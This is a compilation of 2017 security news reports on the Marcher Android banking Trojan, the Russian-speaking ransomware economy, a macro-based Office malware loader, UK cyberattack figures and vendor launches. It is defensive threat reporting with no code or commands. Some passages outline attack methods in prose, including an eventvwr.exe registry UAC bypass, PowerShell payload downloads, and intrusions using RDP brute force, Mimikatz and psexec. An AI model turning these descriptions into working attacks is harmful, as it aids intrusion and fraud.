Experts warn of the rapid growth of the Marcher Android banking Trojan
14.2.2017 securityaffairs Android
Malware researchers at the security firm Securify have published a detailed analysis of the Marcher Android banking Trojan.
Security experts at the Securify have published a detailed analysis of the Marcher Android banking Trojan, a threat that has been around since late 2013. First variants of the malware were developed to trick users into handing over their payment card details using Google Play phishing pages. On March 2014, Marcher was observed targeting bank customers in Germany.
In the second half of 2016, the threat targeted dozens of organizations in various countries, including U.S., U.K., Australia, France, Poland, Turkey, and Spain.
The malicious code has been disguised as various popular apps, including WhatsApp and Netflix.
Early 2017, security experts at Zscaler have spotted a strain of the Android Marcher Trojan masqueraded as the recently released Super Mario Run mobile game for Apple’s iOS.
Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.
“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” states the analysis published by Zscaler.
Researchers at Securify have detected nine Marcher botnets over the last 6 months, the threat actors leverage web injects to target a large number of different apps.
The vast majority of bots were located in Germany (51%), followed by France (20%), and UK (7%).
“Based on statistics of the backend we know that their campaign has successfully infected 5696 German and 2198 French mobile devices over total of 11049 affected mobile devices.” reads the analysis published by Securify. “While assessing their C2 server, we found that most infected devices are running Android 6.0.1. The C2 server at the time of investigation contained at least 1300 credit card numbers and other bank information (username/password + SMS tan). “
The Marcher malware is able to check foreground apps, when a targeted app is executed the malicious code uses an overlay screen to trick victims into handing over sensitive information, such as login credentials and credit card data.
“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.
The malware also implements a simple as effective antivirus evasion technique, it maintains a list of most popular antivirus solutions for which it prevents the removal. Marcher monitors for any AV app in the list and if it is running, it will force the mobile device back to the home screen. Even the AV program detects the Marcher malware, it will still wait and ask for permission from users before removing it, but because the user can’t give the permission, the malware will not be deleted.
The “solid organization” behind the Marcher Trojan makes the threat very dangerous, experts consider it effective like other notorious banking malware like Sinowal/Torpig, Dyre, Dridex, and Gozi.
“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” concluded the experts.
A look into the Russian-speaking ransomware ecosystem
14.2.2017 Kaspersky Virus
It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.
Kaspersky Lab statistics on the ransomware threat in 2016
In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.
So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:
It’s easy to buy a ransomware build or builder on the underground market
It’s easy to buy a distribution service
Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies
In other words, this is a fine tuned, user friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we’ve learned.
1. In most cases crypto ransomware has a Russian origin
One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.
Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.
But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.
2. There are three types of involvement in the ransomware “business”
The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.
Create new ransomware for sale
Become a partner in a ransomware affiliate program
Become the owner of an affiliate program
The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.
An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.
Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.
The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals’ choice; and which will request administrator privileges until it receives it. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.
The interface of the Glove ransomware builder
Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.
Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.
An advertisement offering unique crypto ransomware with a pay-per-build model
The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.
An example of a command and control panel which comes with the build of a certain ransomware family
Affiliate programs, the third type of involvement in the ransomware criminal business, is a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and couple of bitcoins as a partnership fee.
An advertisement for an affiliate program
Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.
Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.
To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.
3. There are some really big players on this market
If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.
The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise
There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.
4. Costs and profits on the underground ransomware market are high
We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.
The structure of the operating cost of a large ransomware group more or less looks like the following:
Ransomware modules update
New features
Bypass techniques
Encryption improvement
Distribution (spam/exploit kits)
AV check service
Credentials for hacked servers
Salary for hired professionals (usually these are IT administrators who support the server infrastructure)
The core of the whole group’s mechanics is ransomware code and the distribution channels.
They distribute ransomware in four main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and could cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.
Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.
And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.
How criminals use one infected organization to attack another
It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company’s contact list. It is hard to underestimate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods used by cybercriminals use to distribute malware, there is no way for him/ her to identify the attack.
As we’ve learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we’ve seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let’s go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.
The typical distribution of profit (green) vs. operating costs (red) in a ransomware business
That’s of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we’ve seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000 dollars.
5. Professional ransomware groups are shifting to targeted attacks
An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.
The mechanics of these new attacks are very different to what we’ve been used to seeing.
For initial infection they have not used exploit packs, or spear phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
To get into the organization’s network, this group used open source exploits and tools
If the organization had an unprotected server with RDP access this group tried to use brute force against it
To get the necessary access rights to install ransomware in the network with psexec they used a Mimikatz tool.
Then they could establish persistence using an open sourced RAT tool called PUPY
Once they had gained a foothold in the attacked network, they studied it, choose the most important files and encrypted them with a custom, yet unseen, build of ransomware.
Another group which we have found in another large organization did not use any ransomware at all. They encrypted data manually. To do this they choose important files on a server and move it into a password protected archive.
Conclusion
In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.
1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.
2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.
We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.
It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.
Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.
This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.
Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.
Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.
And the main advice – DO NOT PAY! If you pay the ransom, you money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they get access to, giving them access to much broader attack opportunities.
ThreatConnect Launches New Threat Intelligence Products
14.2.2017 securityweek Security
Threat intelligence firm ThreatConnect announced this week the launch of a new suite of products designed to help organizations understand adversaries, automate their security operations, and accelerate threat mitigation.
The new products, built on the ThreatConnect Platform, have been named TC Complete, TC Analyze, TC Manage and TC Identify.
TC Complete, the company’s flagship product, is a security operations and analytics platform that aims to enable companies to efficiently run their security operation center (SOC) by giving them the ability to orchestrate security processes, analyze data, respond to threats, and report progress from a single location. TC Complete incorporates the features and benefits of all the other ThreatConnect products.
Another new product is TC Identity, which provides vetted threat intelligence collected from over 100 open source feeds, ThreatConnect communities, the company’s research team and, optionally, intelligence from members of the TC Exchange program.
TC Manage is an intelligence-driven orchestration tool that enables organizations to automate threat data management processes, including notifying team members when manual tasks need to be performed, or sending indicators to defensive tools for blocking or alerting.
The last new product is the TC Analyze threat intelligence platform, which provides a central location for analyzing data and integrating with existing security tools. The platform allows analysts to better understand which threats are relevant, gain visibility into attack patterns, and share threat intelligence with executives and other stakeholders.
“By introducing our new innovative suite of products, we are able to address all levels of need in the marketplace. With these four specific products, ThreatConnect allows any organization with any size security team the option to extend its capabilities,” said ThreatConnect VP of Product Andy Pendergast. “We conducted substantial research into organizations’ current and potential intelligence needs to protect their environment and came up with these specific products to reach them where they are now and where they need to be in the future.”
Office Loader leverages malicious macros to deliver multiple malware
14.2.2017 securityaffairs Virus
Security researchers at Palo Alto Networks spotted a campaign leveraging Microsoft Office loader using malicious macros to drop multiple malware families.
The researchers analyzed more than 650 unique samples of this specific loader since early December 2016, accounting for 12,000 phishing email targeting numerous industries.
Most affected industries are High Tech, Professional and Legal Services, and Government.
The Office loader is being delivered via spam messages and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to infected the target.
“The loader itself is primarily delivered via email and makes use of heavily obfuscated malicious macros as well as a user account control (UAC) bypass technique that was originally discovered in August 2016.” reads the analysis published PaloAlto Networks.
The phishing messages used several malicious documents masqueraded as invoices, product lists, deposit slips, or document scans, and more.
The Office loader was used to drop several malware such as LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” continues the analysis.
According to the experts, threat actor behind the campaign may have used a builder to generate the malicious macros that have been obfuscated with a large amount of garbage code and randomly chosen variables. The second part of the malicious macro includes also obfuscated strings and a number of strings written to the Word document.
The first half of the macro includes a function to decode the obfuscated strings.
“In the second half of the macro, we see a garbage code, a number of obfuscated strings, as well as a number of strings that are written to the Word document. These strings are in-line with the ploy being used by the attacker based on the witnessed subject line and filename.” reads the analysis.
“This function will download a file via PowerShell and drop it within the %TEMP% directory. It then sets a specific registry key to point to this newly dropped file. Finally, it will execute the built-in eventvwr.exe process, sleep for roughly 15 seconds by performing a ping against the localhost 15 times, and removes the executes the dropped file. The registry key write and execution of eventvwr.exe is a UAC bypass technique that was first discussed here. “
The experts noticed that a small number of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware.
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns.” concluded PaloAlto Networks. “It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.”
IaaS Creating New Variant of Shadow IT
13.2.2017 securityweek Crime
Custom Applications are being Increasingly Used from Within Public Clouds as Part of the Migration to IaaS
Organizations cannot rely on commercial off-the-shelf (COTS) software to fulfil all their IT requirements: almost all companies develop their own custom apps. The majority of these apps, whether internal or internet-facing, currently run on datacenters owned or operated locally. By the end of 2017 this will change -- the majority of enterprise custom apps will reside in public clouds as the industry-wide migration to Infrastructure as a Service (IaaS) increases speed.
A new report, conceived and developed by the Cloud Security Alliance and Skyhigh Networks, polled 314 qualified respondents in December 2016 and January 2017. The results (PDF) show that an increasing number of custom apps are being moved into cloud infrastructures (primarily AWS, Azure and Google Cloud Platform) without the security team necessarily being aware that they exist. This is effectively a new variant of Shadow IT -- it is not necessarily software unknown to the IT department, but it is software unknown to the head of security.
This presents a new security and compliance challenge since CISOs cannot secure what they cannot see. It is possible that the app developers assume that their apps are protected by the cloud providers' security, and therefore don't need to be sanctioned by in-house security. Certainly, the majority of respondents believe that IaaS is more secure than local data centers simply because of the huge security resources available to Amazon, Microsoft and Google.
But clouds operate a form of shared responsibility under which the customer is responsible for the data it uploads and the apps it develops. The report cites the example of Code Spaces, which provided a code repository for its customers on AWS. It was breached. AWS was not compromised, but rather the attackers got hold of a legitimate Code Spaces account password. Ultimately, they destroyed all the customers' data, and the effect on Code Spaces was so severe that it went out of business.
What the Skyhigh survey highlights is that more and more custom apps are being used from within public clouds as part of the migration to IaaS.
"The security of custom applications has not been a focus in many organizations," explains Nigel Hawthorn, Skyhigh's chief European spokesperson, "but every company is now a software company; 92 percent of them write their own custom apps, and the average enterprise will have more than 500 apps running in the next year. Moreover, 72% of companies have a bespoke critical app running today that is essential to operations. When these workloads are targeted by a cyberattack or fall victim to a mistake, the downtime will cost a business dearly. It's no surprise that application innovation is ahead of security but, with an average of 285 custom apps running that are unknown to IT security teams, companies must ensure that IT security is part of the custom app development process."
The actual number of apps unknown to security varies with the size of the organization. Small companies, with less than 1,000 employees, can have as few as 22 custom apps; but large companies with more than 50,000 employees can have an average of 788 apps. It is the invisibility of such a large number of them that causes the security concern. Sixty-five percent of respondents said they are moderately or very concerned for the security of custom apps in the cloud, with only 13.8% 'not at all concerned'.
"IT security professionals," says the report, "are only aware of 38.4% of the applications known to IT administrators. This means that IT security teams are involved in fewer than half of these applications to ensure corporate data is protected against threats. Rather than security being a barrier to development, it appears development is occurring without involvement from security."
The biggest single concern (from 66.5% of respondents) is that unprotected apps could be used to upload sensitive data to the cloud. This is followed at 56% by a third-party account compromise similar to the one suffered by Code Spaces. But 40.1% are also concerned about sensitive data being downloaded from the cloud to an unmanaged BYOD device.
Loss of personal data could be expensive under data protection regulations and damaging to brand reputation; but some of the custom apps are actually critical to business operations. Almost 73% of the respondents said they have at least one business-critical application. Forty-six percent of these are either fully deployed in the public cloud or in a hybrid public/private cloud -- and IT security professionals have incomplete visibility into their deployment and operations. As the migration to IaaS continues, the number of business-critical custom apps at risk will undoubtedly increase.
"Securing sensitive data in the cloud is no longer the remit of one party, it's a shared responsibility," says Hawthorn. "The rapid adoption of IaaS deployments sees the role split between infrastructure providers and enterprises, while internally, businesses cannot expect IT to manage cloud security alone. There needs to be buy-in from all departments to ensure custom applications have cybersecurity imbedded from the start, and that employees continue to use them in ways that won't put corporate data at risk."
Last week, Skyhigh Networks SVP of products and marketing, Kamal Shah, announced in a blog post, "Skyhigh will pioneer this next phase of the cloud security market with Skyhigh for Custom Apps and Skyhigh for Amazon Web Services, Microsoft Azure, and Google Cloud Platform.
RSA Unveils Business-Driven Security Offering
13.2.2017 securityweek Security
RSA, which since September is part of Dell Technologies, on Monday unveiled a new approach and product improvements designed to help organizations manage cyber risk.
With its new Business-Driven Security architecture, RSA aims to provide organizations the tools needed to link security information to business context and protect the most sensitive assets.
The RSA Business-Driven Security solutions focus on threat detection and response, consumer fraud protection, identity and access assurance, and business risk management.
This includes the RSA NetWitness Suite, which provides visibility and actionable insight for detecting advanced threats and understanding the full scope of an incident. The new capabilities added to the product enable organizations to monitor any infrastructure by collecting data from public clouds (e.g. AWS, Microsoft Azure), virtual environments, and physical infrastructure.RSA launches new solution
The launch of Business-Driven Security also brings improvements to RSA SecurID Access. RSA says the multi-factor authentication and access management product now offers a better way for delivering strong security to users, devices and applications.
The latest release of the RSA Fraud & Risk Intelligence Suite brings a centralized platform designed to improve fraud detection and investigation. The new platform should enable organizations to better protect their customers against cyberattacks by allowing them to obtain additional insights, including from internal and external sources, and other anti-fraud tools.
The offering also includes the RSA Archer Ignition Program, which helps organizations manage business risk through a combination of Governance Risk and Compliance (GRC) use cases, quick launch services and education offerings.
Finally, the Business-Driven Security architecture is operationalized via the new RSA Risk & Cybersecurity Practice. The practice aims to reduce business risk through risk management, identity assurance, incident response, and advanced cyber defense.
“Despite best efforts, today’s security approaches are in dire need of transformation because they fall short when they are put into action. This forces organizations into a downward cycle of investment and re-investment,” said Rohit Ghai, President, RSA. “RSA is proud to provide a new architecture and array of Business-Driven Security solutions that are engineered to enable the most critical elements of a sound security strategy: linking business context with security incidents to more strategically address and manage business risk to protect what matters most.”
National Cyber Security Centre – UK hit by dozens of major cyber attacks each month
13.2.2017 securityaffairs Cyber
Britain’s security has been threatened by 188 major cyber attacks in the last three months, according to the head of the National Cyber Security Centre.
According to the head of the National Cyber Security Centre (NCSC), the UK government suffered at least 188 major cyber attacks in the past three months.
Ciaran Martin, former GCHQ cybersecurity chief, told The Sunday Times that the attacks are mostly from China and Russia.
The attacks threatened national security, nation-state actors conducted cyber espionage campaigns aimed to “extract information on UK government policy on anything from energy to diplomacy to information on a particular sector.”
“Britain is being hit by 60 significant cyber-attacks a month, including attempts by Russian state-sponsored hackers to steal defence and foreign policy secrets from government departments, the new cyber-security chief has revealed.” reported the told The Sunday Times
“In his first key interview, Ciaran Martin, head of GCHQ’s new National Cyber Security Centre (NCSC), warned there had been a “step change” in Russia’s online aggression against the West as well as more attacks on “soft targets” such as local councils and charities to steal personal data, and universities to steal research secrets.”
National Cyber Security Centre
Martin confirmed that the UK suffered state-sponsored attacks similar to those that targeted the Democratic National Committee in the 2016 Presidential Election.
UK authorities highlighted “a step-change in Russian aggression in cyber space” across the years.
“Part of that step change has been a series of attacks on political institutions, political parties, parliamentary organizations and that’s all very well evidenced by our international partners and widely accepted,” he said.
The National Cyber Security Centre had blocked 34,550 “potential attacks” on UK entities over the past six months.
“Meanwhile, Chancellor Phillip Hammond – a former defence and foreign secretary – said the NCSC had blocked 34,550 “potential attacks” on government departments and members of the public in the last six months – a rate of about 200 a day.” reported the BBC.
Office Loader Uses Macros to Drop Array of Malware
13.2.2017 securityweek Virus
A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.
More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.
The roughly 12,000 phishing email runs distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, and email verification notifications, among others. The attached malicious documents were masquerading as invoices, product lists, deposit slips, or document scans, and more.
High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.
Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.
The loader uses malicious macros that have been obfuscated using a large amount of garbage code and randomly chosen variables, which led researchers to believe that a builder was used to generate them. The second part of the malicious macro, researchers say, includes not only garbage code, but also obfuscated strings and a number of strings written to the Word document and which are in-line with the ploy used by the attacker, based on the subject line and filename.
The first half of the macro, on the other hand, includes a function to decode the obfuscated strings, after which they are called with a PowerShell command. To decode the strings, the macro simply removes characters present within a blacklist string. However, researchers say that only about half of the samples contained decoy information.
One of the decoded functions was meant to download a payload via PowerShell and then drop it within the %TEMP% directory. The macro would also create a registry key to point to the dropped file, while also abusing Windows Event Viewer to bypass UAC and elevate its privileges. The dropped file is then removed.
The UAC bypass was first detailed in August 2016, and was recently used in various campaigns, including some focused on the distribution of ransomware.
A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. The technique was associated with 11 samples that were spotted in early December, when the loader first appeared. However, the attackers switched to PowerShell.
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.
Survey Examines Cybersecurity Perception in U.S.
13.2.2017 securityweek Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America
A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.
5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.
The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.
However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.
Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.
Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."
This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."
Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).
The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.
The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."
Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."
"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."
Thousands of Android Devices Infected by Marcher Trojan
13.2.2017 securityweek Android
Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards.
Marcher has been around since late 2013, but it initially attempted to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, the malware started targeting banks in Germany and, by the summer of 2016, there had already been more than 60 targeted organizations in the U.S., U.K., Australia, France, Poland, Turkey, Spain and other countries.
The malware has been disguised as various popular apps, including Netflix, WhatsApp and Super Mario Run.
Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.
One of these botnets, which mainly targets the customers of banks in Germany, Austria and France, has infected more than 11,000 devices, including 5.700 in Germany and 2,200 in France. The attackers’ C&C server stored 1,300 payment card numbers and other banking information.
Based on the analysis of the command and control (C&C) server used by the cybercriminals, researchers determined that a majority of the infected devices had been running Android 6.0.1, but the list of victims also included more than 100 Android 7.0 devices.
Marcher monitors the applications launched by the victim, and when one of the targeted apps is detected, an overlay screen is displayed in an effort to trick the user into handing over sensitive information.
“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.
In order to avoid being removed by security products, Marcher blocks popular mobile antivirus applications. Seven months ago, researchers said the Trojan had been blocking eight antiviruses, but Securify’s report shows that the malware currently targets nearly two dozen products.
“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” experts said.
Microsoft Unveils New Security and Risk Capabilities in Office 365
13.2.2017 securityweek Security
Microsoft has unveiled several new capabilities in Office 365 to help customers better manage risks and protect against threats, including Office 365 Secure Score, Threat Intelligence Private Preview, and Advanced Data Governance Preview.
Office 365 Secure Score was designed as a security analytics tool that applies a score to the customers’ Office 365 security configuration. Secure Score, says Alym Rayani, director for Microsoft's Office Security and Compliance team, was created to provide customers with improved visibility into their Office 365 security configuration and into the security features available to them.
